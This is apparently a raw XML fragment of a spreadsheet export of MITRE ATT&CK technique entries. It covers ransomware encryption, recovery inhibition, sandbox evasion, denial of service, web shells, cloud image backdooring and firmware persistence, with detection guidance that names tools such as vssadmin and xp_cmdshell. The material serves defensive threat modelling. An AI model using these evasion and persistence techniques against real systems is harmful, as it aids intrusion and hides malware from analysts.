    <t>https://attack.mitre.org/techniques/T1484/002</t>
  </si>
  <si>
    <t>11 January 2021</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</si>
  <si>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</si>
  <si>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Blake Strom, Microsoft 365 Defender</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1485</t>
  </si>
  <si>
    <t>14 March 2019</t>
  </si>
  <si>
    <t>Impact</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</si>
  <si>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</si>
  <si>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Brent Murphy, Elastic; David French, Elastic; Prasad Somasamudram, McAfee; Sekhar Sarukkai, McAfee ; Syed Ummar Farooqh, McAfee; Varonis Threat Labs</t>
  </si>
  <si>
    <t>Availability</t>
  </si>
  <si>
    <t>Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.(Citation: US-CERT Ransomware 2016)(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017)(Citation: US-CERT SamSam 2018) In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted. In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.(Citation: US-CERT NotPetya 2017)
To maximize impact on the target organization, malware designed for encrypting data may have worm-like features to propagate across a network by leveraging other attack techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017)
In cloud environments, storage objects within compromised accounts may also be encrypted.(Citation: Rhino S3 Ransomware Part 1)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1486</t>
  </si>
  <si>
    <t>15 March 2019</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</si>
  <si>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</si>
  <si>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Oleg Kolesnikov, Securonix</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1489</t>
  </si>
  <si>
    <t>29 March 2019</t>
  </si>
  <si>
    <t>02 March 2021</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</si>
  <si>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</si>
  <si>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Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017)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t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1490</t>
  </si>
  <si>
    <t>02 April 2019</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and command line parameters of binaries involved in inhibiting system recovery, such as vssadmin, wbadmin, and bcdedit. The Windows event logs, ex. Event ID 524 indicating a system catalog was deleted, may contain entries associated with suspicious activity.
Monitor the status of services involved in system recovery. Monitor the registry for changes associated with system recovery features (ex: the creation of &lt;code&gt;HKEY_CURRENT_USER\Software\Policies\Microsoft\PreviousVersions\DisableLocalPage&lt;/code&gt;).</t>
  </si>
  <si>
    <t>Yonatan Gotlib, Deep Instinct</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may modify visual content available internally or externally to an enterprise network.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</si>
  <si>
    <t>https://attack.mitre.org/techniques/T1491</t>
  </si>
  <si>
    <t>08 April 2019</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor internal and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
</t>
  </si>
  <si>
    <t>Integrity</t>
  </si>
  <si>
    <t>Defacement: Internal Defacement</t>
  </si>
  <si>
    <t>An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users. This may take the form of modifications to internal websites, or directly to user systems with the replacement of the desktop wallpaper.(Citation: Novetta Blockbuster) Disturbing or offensive images may be used as a part of [Internal Defacement](https://attack.mitre.org/techniques/T1491/001) in order to cause user discomfort, or to pressure compliance with accompanying messages. Since internally defacing systems exposes an adversary's presence, it often takes place after other intrusion goals have been accomplished.(Citation: Novetta Blockbuster Destructive Malware)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1491/001</t>
  </si>
  <si>
    <t>20 February 2020</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</si>
  <si>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</si>
  <si>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Defacement: External Defacement</t>
  </si>
  <si>
    <t>An adversary may deface systems external to an organization in an attempt to deliver messaging, intimidate, or otherwise mislead an organization or users. Externally-facing websites are a common victim of defacement; often targeted by adversary and hacktivist groups in order to push a political message or spread propaganda.(Citation: FireEye Cyber Threats to Media Industries)(Citation: Kevin Mandia Statement to US Senate Committee on Intelligence)(Citation: Anonymous Hackers Deface Russian Govt Site) [External Defacement](https://attack.mitre.org/techniques/T1491/002) may be used as a catalyst to trigger events, or as a response to actions taken by an organization or government. Similarly, website defacement may also be used as setup, or a precursor, for future attacks such as [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).(Citation: Trend Micro Deep Dive Into Defacement)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1491/002</t>
  </si>
  <si>
    <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</si>
  <si>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Adversaries may overwrite or corrupt the flash memory contents of system BIOS or other firmware in devices attached to a system in order to render them inoperable or unable to boot.(Citation: Symantec Chernobyl W95.CIH) Firmware is software that is loaded and executed from non-volatile memory on hardware devices in order to initialize and manage device functionality. These devices could include the motherboard, hard drive, or video cards.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1495</t>
  </si>
  <si>
    <t>12 April 2019</t>
  </si>
  <si>
    <t>System firmware manipulation may be detected.(Citation: MITRE Trustworthy Firmware Measurement) Log attempts to read/write to BIOS and compare against known patching behavior.</t>
  </si>
  <si>
    <t>Adversaries may leverage the resources of co-opted systems in order to solve resource intensive problems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cloud-based(Citation: CloudSploit - Unused AWS Regions) systems are common targets because of the high potential for available resources, but user endpoint systems may also be compromised and used for Resource Hijacking and cryptocurrency mining.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kills off processes for competing malware to ensure it’s not competing for resources.(Citation: Trend Micro War of Crypto Miners)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1496</t>
  </si>
  <si>
    <t>17 April 2019</t>
  </si>
  <si>
    <t>14 April 2021</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</si>
  <si>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</si>
  <si>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Alfredo Oliveira, Trend Micro; David Fiser, @anu4is, Trend Micro; Jay Chen, Palo Alto Networks; Magno Logan, @magnologan, Trend Micro; Vishwas Manral, McAfee; Yossi Weizman, Azure Defender Research Team</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may employ various means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use several methods to accomplish [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) such as checking for security monitoring tools (e.g., Sysinternals, Wireshark, etc.) or other system artifacts associated with analysis or virtualization. Adversaries may also check for legitimate user activity to help determine if it is in an analysis environment. Additional methods include use of sleep timers or loops within malware code to avoid operating within a temporary sandbox.(Citation: Unit 42 Pirpi July 2015)
</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1497</t>
  </si>
  <si>
    <t>Defense Evasion, Discovery</t>
  </si>
  <si>
    <t>Virtualization, sandbox, user activity, and related discovery techniques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</si>
  <si>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Deloitte Threat Library Team; Sunny Neo</t>
  </si>
  <si>
    <t>Anti-virus, Host forensic analysis, Signature-based detection, Static File Analysis</t>
  </si>
  <si>
    <t>Virtualization/Sandbox Evasion: System Checks</t>
  </si>
  <si>
    <t>Adversaries may employ various system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Specific checks will vary based on the target and/or adversary, but may involve behaviors such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047), [PowerShell](https://attack.mitre.org/techniques/T1059/001), [System Information Discovery](https://attack.mitre.org/techniques/T1082), and [Query Registry](https://attack.mitre.org/techniques/T1012) to obtain system information and search for VME artifacts. Adversaries may search for VME artifacts in memory, processes, file system, hardware, and/or the Registry. Adversaries may use scripting to automate these checks  into one script and then have the program exit if it determines the system to be a virtual environment. 
Checks could include generic system properties such as host/domain name and samples of network traffic. Adversaries may also check the network adapters addresses, CPU core count, and available memory/drive size. 
Other common checks may enumerate services running that are unique to these applications, installed programs on the system, manufacturer/product fields for strings relating to virtual machine applications, and VME-specific hardware/processor instructions.(Citation: McAfee Virtual Jan 2017) In applications like VMWare, adversaries can also use a special I/O port to send commands and receive output. 
Hardware checks, such as the presence of the fan, temperature, and audio devices, could also be used to gather evidence that can be indicative a virtual environment. Adversaries may also query for specific readings from these devices.(Citation: Unit 42 OilRig Sept 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1497/001</t>
  </si>
  <si>
    <t>06 March 2020</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</si>
  <si>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</si>
  <si>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Deloitte Threat Library Team</t>
  </si>
  <si>
    <t>Virtualization/Sandbox Evasion: User Activity Based Checks</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may employ various user activity checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)
Adversaries may search for user activity on the host based on variables such as the speed/frequency of mouse movements and clicks (Citation: Sans Virtual Jan 2016) , browser history, cache, bookmarks, or number of files in common directories such as home or the desktop. Other methods may rely on specific user interaction with the system before the malicious code is activated, such as waiting for a document to close before activating a macro (Citation: Unit 42 Sofacy Nov 2018) or waiting for a user to double click on an embedded image to activate.(Citation: FireEye FIN7 April 2017) </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1497/002</t>
  </si>
  <si>
    <t xml:space="preserve">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</si>
  <si>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Virtualization/Sandbox Evasion: Time Based Evasion</t>
  </si>
  <si>
    <t>Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include enumerating time-based properties, such as uptime or the system clock, as well as the use of timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time.
Adversaries may employ various time-based evasions, such as delaying malware functionality upon initial execution using programmatic sleep commands or native system scheduling functionality (ex: [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053)). Delays may also be based on waiting for specific victim conditions to be met (ex: system time, events, etc.) or employ scheduled [Multi-Stage Channels](https://attack.mitre.org/techniques/T1104) to avoid analysis and scrutiny.(Citation: Deloitte Environment Awareness)
Benign commands or other operations may also be used to delay malware execution. Loops or otherwise needless repetitions of commands, such as [Ping](https://attack.mitre.org/software/S0097)s, may be used to delay malware execution and potentially exceed time thresholds of automated analysis environments.(Citation: Revil Independence Day)(Citation: Netskope Nitol) Another variation, commonly referred to as API hammering, involves making various calls to [Native API](https://attack.mitre.org/techniques/T1106) functions in order to delay execution (while also potentially overloading analysis environments with junk data).(Citation: Joe Sec Nymaim)(Citation: Joe Sec Trickbot)
Adversaries may also use time as a metric to detect sandboxes and analysis environments, particularly those that attempt to manipulate time mechanisms to simulate longer elapses of time. For example, an adversary may be able to identify a sandbox accelerating time by sampling and calculating the expected value for an environment's timestamp before and after execution of a sleep function.(Citation: ISACA Malware Tricks)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1497/003</t>
  </si>
  <si>
    <t xml:space="preserve">Time-based evasion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</si>
  <si>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Deloitte Threat Library Team; Jeff Felling, Red Canary; Jorge Orchilles, SCYTHE; Ruben Dodge, @shotgunner101</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</si>
  <si>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For DoS attacks targeting the hosting system directly, see [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1499).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1498</t>
  </si>
  <si>
    <t>12 April 2021</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</si>
  <si>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</si>
  <si>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Network Denial of Service: Direct Network Flood</t>
  </si>
  <si>
    <t>Adversaries may attempt to cause a denial of service (DoS) by directly sending a high-volume of network traffic to a target. [Direct Network Flood](https://attack.mitre.org/techniques/T1498/001)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</si>
  <si>
    <t>https://attack.mitre.org/techniques/T1498/001</t>
  </si>
  <si>
    <t>02 March 2020</t>
  </si>
  <si>
    <t>Detection of a network flood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network flood event as it starts. Often, the lead time may be small and the indicator of an event availability of the network or service drops. The analysis tools mentioned can then be used to determine the type of DoS causing the outage and help with remediation.</t>
  </si>
  <si>
    <t>Network Denial of Service: Reflection Amplification</t>
  </si>
  <si>
    <t>Adversaries may attempt to cause a denial of service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 may be used to focus traffic on the target.(Citation: Cloudflare ReflectionDoS May 2017)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</si>
  <si>
    <t>https://attack.mitre.org/techniques/T1498/002</t>
  </si>
  <si>
    <t>Detection of reflection amplification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 reflection amplification DoS event as it starts. Often, the lead time may be small and the indicator of an event availability of the network or service drops. The analysis tools mentioned can then be used to determine the type of DoS causing the outage and help with remediation.</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1499</t>
  </si>
  <si>
    <t>18 April 2019</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</si>
  <si>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
Externally monitor the availability of services that may be targeted by an Endpoint DoS.</t>
  </si>
  <si>
    <t>Alfredo Oliveira, Trend Micro; David Fiser, @anu4is, Trend Micro; Magno Logan, @magnologan, Trend Micro; Vishwas Manral, McAfee; Yossi Weizman, Azure Defender Research Team</t>
  </si>
  <si>
    <t>Endpoint Denial of Service: OS Exhaustion Flood</t>
  </si>
  <si>
    <t>Adversaries may target the operating system (OS) for a DoS attack, since the (OS) is responsible for managing the finite resources on a system. These attacks do not need to exhaust the actual resources on a system since they can simply exhaust the limits that an OS self-imposes to prevent the entire system from being overwhelmed by excessive demands on its capacity.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</si>
  <si>
    <t>https://attack.mitre.org/techniques/T1499/001</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</si>
  <si>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t>
  </si>
  <si>
    <t>Endpoint Denial of Service: Service Exhaustion Flood</t>
  </si>
  <si>
    <t>Adversaries may target the different network services provided by systems to conduct a DoS. Adversaries often target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</si>
  <si>
    <t>https://attack.mitre.org/techniques/T1499/002</t>
  </si>
  <si>
    <t>Endpoint Denial of Service: Application Exhaustion Flood</t>
  </si>
  <si>
    <t>Adversaries may target resource intensive features of web applications to cause a denial of service (DoS). Specific features in web applications may be highly resource intensive. Repeated requests to those features may be able to exhaust system resources and deny access to the application or the server itself. (Citation: Arbor AnnualDoSreport Jan 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1499/003</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</si>
  <si>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t>
  </si>
  <si>
    <t>Endpoint Denial of Service: Application or System Exploitation</t>
  </si>
  <si>
    <t>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DoS condition.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1499/004</t>
  </si>
  <si>
    <t>Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack. Externally monitor the availability of services that may be targeted by an Endpoint DoS.</t>
  </si>
  <si>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t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1505</t>
  </si>
  <si>
    <t>28 June 2019</t>
  </si>
  <si>
    <t xml:space="preserve">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
Process monitoring may be used to detect servers components that perform suspicious actions such as running cmd.exe or accessing files. Log authentication attempts to the server and any unusual traffic patterns to or from the server and internal network. (Citation: US-CERT Alert TA15-314A Web Shells) </t>
  </si>
  <si>
    <t>Server Software Component: SQL Stored Procedures</t>
  </si>
  <si>
    <t xml:space="preserve">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
Adversaries may craft malicious stored procedures that can provide a persistence mechanism in SQL database servers.(Citation: NetSPI Startup Stored Procedures)(Citation: Kaspersky MSSQL Aug 2019) To execute operating system commands through SQL syntax the adversary may have to enable additional functionality, such as xp_cmdshell for MSSQL Server.(Citation: NetSPI Startup Stored Procedures)(Citation: Kaspersky MSSQL Aug 2019)(Citation: Microsoft xp_cmdshell 2017) 
Microsoft SQL Server can enable common language runtime (CLR) integration. With CLR integration enabled, application developers can write stored procedures using any .NET framework language (e.g. VB .NET, C#, etc.).(Citation: Microsoft CLR Integration 2017) Adversaries may craft or modify CLR assemblies that are linked to stored procedures since these CLR assemblies can be made to execute arbitrary commands.(Citation: NetSPI SQL Server CLR) </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1505/001</t>
  </si>
  <si>
    <t>12 December 2019</t>
  </si>
  <si>
    <t>On a MSSQL Server, consider monitoring for xp_cmdshell usage.(Citation: NetSPI Startup Stored Procedures) Consider enabling audit features that can log malicious startup activities.</t>
  </si>
  <si>
    <t>Linux, Windows</t>
  </si>
  <si>
    <t>Carlos Borges, @huntingneo, CIP; Kaspersky; Lucas da Silva Pereira, @vulcanunsec, CIP</t>
  </si>
  <si>
    <t>Server Software Component: Transport Agent</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may abuse Microsoft transport agents to establish persistent access to systems. Microsoft Exchange transport agents can operate on email messages passing through the transport pipeline to perform various tasks such as filtering spam, filtering malicious attachments, journaling, or adding a corporate signature to the end of all outgoing emails.(Citation: Microsoft TransportAgent Jun 2016)(Citation: ESET LightNeuron May 2019) Transport agents can be written by application developers and then compiled to .NET assemblies that are subsequently registered with the Exchange server. Transport agents will be invoked during a specified stage of email processing and carry out developer defined tasks. 
Adversaries may register a malicious transport agent to provide a persistence mechanism in Exchange Server that can be triggered by adversary-specified email events.(Citation: ESET LightNeuron May 2019) Though a malicious transport agent may be invoked for all emails passing through the Exchange transport pipeline, the agent can be configured to only carry out specific tasks in response to adversary defined criteria. For example, the transport agent may only carry out an action like copying in-transit attachments and saving them for later exfiltration if the recipient email address matches an entry on a list provided by the adversary. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1505/002</t>
  </si>
  <si>
    <t>Consider monitoring application logs for abnormal behavior that may indicate suspicious installation of application software components. Consider monitoring file locations associated with the installation of new application software components such as paths from which applications typically load such extensible components.</t>
  </si>
  <si>
    <t>Christoffer Strömblad; ESET</t>
  </si>
  <si>
    <t>Server Software Component: Web Shell</t>
  </si>
  <si>
    <t xml:space="preserve">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
In addition to a server-side script, a Web shell may have a client interface program that is used to talk to the Web server (ex: [China Chopper](https://attack.mitre.org/software/S0020) Web shell client).(Citation: Lee 2013) </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1505/003</t>
  </si>
  <si>
    <t>13 December 2019</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</si>
  <si>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</si>
  <si>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Arnim Rupp, Deutsche Lufthansa AG</t>
  </si>
  <si>
    <t>Adversary access to Web server with vulnerability or account to upload and serve the Web shell file.</t>
  </si>
  <si>
    <t>Server Software Component: IIS Components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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1505/004</t>
  </si>
  <si>
    <t>03 June 2021</t>
  </si>
  <si>
    <t>Monitor for creation and/or modification of files (especially DLLs on webservers) that could be abused as malicious ISAPI extensions/filters or IIS modules. Changes to &lt;code&gt;%windir%\system32\inetsrv\config\applicationhost.config&lt;/code&gt; could indicate an IIS module installation.(Citation: Microsoft IIS Modules Overview 2007)(Citation: ESET IIS Malware 2021)
Monitor execution and command-line arguments of &lt;code&gt;AppCmd.exe&lt;/code&gt;, which may be abused to install malicious IIS modules.(Citation: Microsoft IIS Modules Overview 2007)(Citation: Unit 42 RGDoor Jan 2018)(Citation: ESET IIS Malware 2021)</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1518</t>
  </si>
  <si>
    <t>16 September 2019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</si>
  <si>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</si>
  <si>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Software Discovery: Security Software Discovery</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Example commands that can be used to obtain security software information are [netsh](https://attack.mitre.org/software/S0108), &lt;code&gt;reg query&lt;/code&gt; with [Reg](https://attack.mitre.org/software/S0075), &lt;code&gt;dir&lt;/code&gt; with [cmd](https://attack.mitre.org/software/S0106), and [Tasklist](https://attack.mitre.org/software/S0057), but other indicators of discovery behavior may be more specific to the type of software or security system the adversary is looking for. It is becoming more common to see macOS malware perform checks for LittleSnitch and KnockKnock software.
Adversaries may also utilize cloud APIs to discover the configurations of firewall rules within an environment.(Citation: Expel IO Evil in AWS)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1518/001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</si>
  <si>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</si>
  <si>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Implant Internal Image</t>
  </si>
  <si>
    <t>Adversaries may implant cloud or container images with malicious code to establish persistence after gaining access to an environment. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be implanted or backdoored. Unlike [Upload Malware](https://attack.mitre.org/techniques/T1608/001), this technique focuses on adversaries implanting an image in a registry within a victim’s environment. Depending on how the infrastructure is provisioned, this could provide persistent access if the infrastructure provisioning tool is instructed to always use the latest image.(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019)
A tool has been developed to facilitate planting backdoors in cloud container images.(Citation: Rhino Labs Cloud Backdoor September 2019) If an attacker has access to a compromised AWS instance, and permissions to list the available container images, they may implant a backdoor such as a [Web Shell](https://attack.mitre.org/techniques/T1505/003).(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1525</t>
  </si>
  <si>
    <t>04 September 2019</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor interactions with images and containers by users to identify ones that are added or modified anomalously.
In containerized environments, changes may be detectable by monitoring the Docker daemon logs or setting up and monitoring Kubernetes audit logs depending on registry configuration. </t>
  </si>
  <si>
    <t>Praetorian; Vishwas Manral, McAfee; Yossi Weizman, Azure Defender Research Team</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</si>
  <si>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Stormspotter is an open source tool for enumerating and constructing a graph for Azure resources and services, and Pacu is an open source AWS exploitation framework that supports several methods for discovering cloud services.(Citation: Azure - Stormspotter)(Citation: GitHub Pacu)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1526</t>
  </si>
  <si>
    <t>30 August 2019</t>
  </si>
  <si>
    <t>Cloud service discovery techniques will likely occur throughout an operation where an adversary is targeting cloud-based systems and services. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
Normal, benign system and network events that look like cloud service discovery may be uncommon, depending on the environment and how they are used. Monitor cloud service usage for anomalous behavior that may indicate adversarial presence within the environment.</t>
  </si>
  <si>
    <t>Praetorian; Suzy Schapperle - Microsoft Azure Red Team</t>
  </si>
  <si>
    <t>Adversaries can steal user application access tokens as a means of acquiring credentials to access remote systems and resources. This can occur through social engineering and typically requires user action to grant access.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link through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Adversaries have been seen targeting Gmail, Microsoft Outlook, and Yahoo Mail users.(Citation: Amnesty OAuth Phishing Attacks, August 2019)(Citation: Trend Micro Pawn Storm OAuth 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1528</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</si>
  <si>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</si>
  <si>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Azure AD, Google Workspace, Office 365, SaaS</t>
  </si>
  <si>
    <t>Jeff Sakowicz, Microsoft Identity Developer Platform Services (IDPM Services); Mark Wee; Saisha Agrawal, Microsoft Threat Intelligent Center (MSTIC); Shailesh Tiwary (Indian Army)</t>
  </si>
  <si>
    <t>Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.(Citation: Microsoft Shutdown Oct 2017) Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.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</si>
  <si>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https://attack.mitre.org/techniques/T1529</t>
  </si>
  <si>
    <t>04 October 2019</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and command line parameters of binaries involved in shutting down or rebooting systems. Windows event logs may also designate activity associated with a shutdown/reboot, ex. Event ID 1074 and 6006.</t>
  </si>
  <si>
    <t>Adversaries may access data objects from improperly secured cloud storage.
Many cloud service providers offer solutions for online data storage such as Amazon S3, Azure Storage, and Google Cloud Storage. These solutions differ from other storage solutions (such as SQL or Elasticsearch) in that there is no overarching application. Data from these solutions can be retrieved directly using the cloud provider's APIs. Solution providers typically offer security guides to help end users configure systems.(Citation: Amazon S3 Security, 2019)(Citation: Microsoft Azure Storage Security, 2019)(Citation: Google Cloud Storage Best Practices, 2019)
Misconfiguration by end users is a common problem. There have been numerous incidents where cloud storage has been improperly secured (typically by unintentionally allowing public access by unauthenticated users or overly-broad access by all users), allowing open access to credit cards, personally identifiable information, medical records, and other sensitive information.(Citation: Trend Micro S3 Exposed PII, 2017)(Citation: Wired Magecart S3 Buckets, 2019)(Citation: HIPAA Journal S3 Breach, 2017) Adversaries may also obtain leaked credentials in source repositories, logs, or other means as a way to gain access to cloud storage objects that have access permission controls.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1530</t>
  </si>
  <si>
    <t>Monitor for unusual queries to the cloud provider's storage service. Activity originating from unexpected sources may indicate improper permissions are set that is allowing access to data. Additionally, detecting failed attempts by a user for a certain object, followed by escalation of privileges by the same user, and access to the same object may be an indication of suspicious activity.</t>
  </si>
  <si>
    <t>IaaS</t>
  </si>
  <si>
    <t>Netskope; Praetorian</t>
  </si>
  <si>
    <t>Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts.
Adversaries may also subsequently log off and/or reboot boxes to set malicious changes into place.(Citation: CarbonBlack LockerGoga 2019)(Citation: Unit42 LockerGoga 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1531</t>
  </si>
  <si>
    <t>09 October 2019</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and command line parameters of binaries involved in deleting accounts or changing passwords, such as use of [Net](https://attack.mitre.org/software/S0039). Windows event logs may also designate activity associated with an adversary's attempt to remove access to an account:
* Event ID 4723 - An attempt was made to change an account's password
* Event ID 4724 - An attempt was made to reset an account's password
* Event ID 4726 - A user account was deleted
* Event ID 4740 - A user account was locked out
Alerting on [Net](https://attack.mitre.org/software/S0039) and these Event IDs may generate a high degree of false positives, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible.</t>
  </si>
  <si>
    <t>Adversaries may use internal spearphishing to gain access to additional information or exploit other users within the same organization after they already have access to accounts or systems within the environment. Internal spearphishing is multi-staged attack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attack and began warning employees of the threat, the SEA sent phishing emails mimicking the Financial Times IT department and were able to compromise even more users.(Citation: THE FINANCIAL TIMES LTD 2019.)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1534</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</si>
  <si>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attacks.(Citation: Trend Micro When Phishing Starts from the Inside 2017)</t>
  </si>
  <si>
    <t>Google Workspace, Linux, Office 365, SaaS, Windows, macOS</t>
  </si>
  <si>
    <t>Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC); Tim MalcomVetter</t>
  </si>
  <si>
    <t>Adversaries may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
A variation on this behavior takes advantage of differences in functionality across cloud regions. An adversary could utilize regions which do not support advanced detection services in order to avoid detection of their activity.
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t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1535</t>
  </si>
  <si>
    <t>Monitor system logs to review activities occurring across all cloud environments and regions. Configure alerting to notify of activity in normally unused regions or if the number of instances active in a region goes above a certain threshold.(Citation: CloudSploit - Unused AWS Regions)</t>
  </si>
  <si>
    <t>Netskope</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may exfiltrate data by transferring the data, including backups of cloud environments, to another cloud account they control on the same service to avoid typical file transfers/downloads and network-based exfiltration detection.
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
Incidents have been observed where adversaries have created backups of cloud instances and transferred them to separate accounts.(Citation: DOJ GRU Indictment Jul 2018) </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1537</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor account activity for attempts to share data, snapshots, or backups with untrusted or unusual accounts on the same cloud service provider. Monitor for anomalous file transfer activity between accounts and to untrusted VPCs. </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</si>
  <si>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
Depending on the configuration of the environment, an adversary may be able to enumerate more information via the graphical dashboard than an API. This allows the adversary to gain information without making any API requests.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1538</t>
  </si>
  <si>
    <t>Monitor account activity logs to see actions performed and activity associated with the cloud service management console. Some cloud providers, such as AWS, provide distinct log events for login attempts to the management console.(Citation: AWS Console Sign-in Events)</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</si>
  <si>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 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</si>
  <si>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https://attack.mitre.org/techniques/T1539</t>
  </si>
  <si>
    <t>08 October 2019</t>
  </si>
  <si>
    <t>Monitor for attempts to access files and repositories on a local system that are used to store browser session cookies. Monitor for attempts by programs to inject into or dump browser process memory.</t>
  </si>
  <si>
    <t>Johann Rehberger; Microsoft Threat Intelligence Center (MSTIC)</t>
  </si>
  <si>
    <t>Adversaries may abuse Pre-OS Boot mechanisms as a way to establish persistence on a system. During the booting process of a computer, firmware and various startup services are loaded before the operating system. These programs control flow of execution before the operating system takes control.(Citation: Wikipedia Booting)
Adversaries may overwrite data in boot drivers or firmware such as BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) to persist on systems at a layer below the operating system. This can be particularly difficult to detect as malware at this level will not be detected by host software-based defenses.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1542</t>
  </si>
  <si>
    <t>13 November 2019</t>
  </si>
  <si>
    <t>22 October 2020</t>
  </si>
  <si>
    <t>Perform integrity checking on pre-OS boot mechanisms that can be manipulated for malicious purposes. Take snapshots of boot records and firmware and compare against known good images. Log changes to boot records, BIOS, and EFI, which can be performed by API calls, and compare against known good behavior and patching.
Disk check, forensic utilities, and data from device drivers (i.e. processes and API calls) may reveal anomalies that warrant deeper investigation. (Citation: ITWorld Hard Disk Health Dec 2014)</t>
  </si>
  <si>
    <t>Linux, Network, Windows</t>
  </si>
  <si>
    <t>Anti-virus, File monitoring, Host intrusion prevention systems</t>
  </si>
  <si>
    <t>Pre-OS Boot: System Firmware</t>
  </si>
  <si>
    <t>Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. (Citation: Wikipedia BIOS) (Citation: Wikipedia UEFI) (Citation: About UEFI)
